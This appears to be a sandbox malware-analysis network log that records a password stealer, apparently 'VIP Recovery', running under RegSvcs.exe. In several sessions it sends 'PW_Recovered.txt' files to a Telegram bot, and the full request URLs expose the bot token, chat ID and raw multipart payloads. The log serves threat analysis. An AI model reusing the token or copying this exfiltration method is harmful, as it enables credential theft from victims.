                                                                          2024-09-19 10:23:59 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12811,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          85192.168.2.561645149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:59 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf64364b823ab
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:59 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 36 34 33 36 34 62 38 32 33 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcf64364b823abContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:59 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:59 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:59 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12812,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          86192.168.2.561649149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:03 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf718b1633c98
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:03 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 37 31 38 62 31 36 33 33 63 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcf718b1633c98Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:03 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:03 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:03 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12813,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          87192.168.2.561648149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:03 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf6c726581a75
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:03 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 36 63 37 32 36 35 38 31 61 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcf6c726581a75Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:03 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:03 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:03 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12814,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          88192.168.2.561653149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:08 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf7aab7810d9f
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:08 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 37 61 61 62 37 38 31 30 64 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcf7aab7810d9fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:08 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:08 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:08 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12816,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          89192.168.2.561652149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:08 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf75e097196ac
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:08 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 37 35 65 30 39 37 31 39 36 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcf75e097196acContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:08 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:08 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:08 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12817,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          90192.168.2.561656149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:10 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf96e2d7c1904
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:10 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 36 65 32 64 37 63 31 39 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcf96e2d7c1904Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:24:10 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:10 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:24:10 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12818,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          91192.168.2.561658149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:24:12 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcf87acb7f0612
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:24:12 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 38 37 61 63 62 37 66 30 36 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dcf87acb7f0612Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:24:12 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:24:12 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
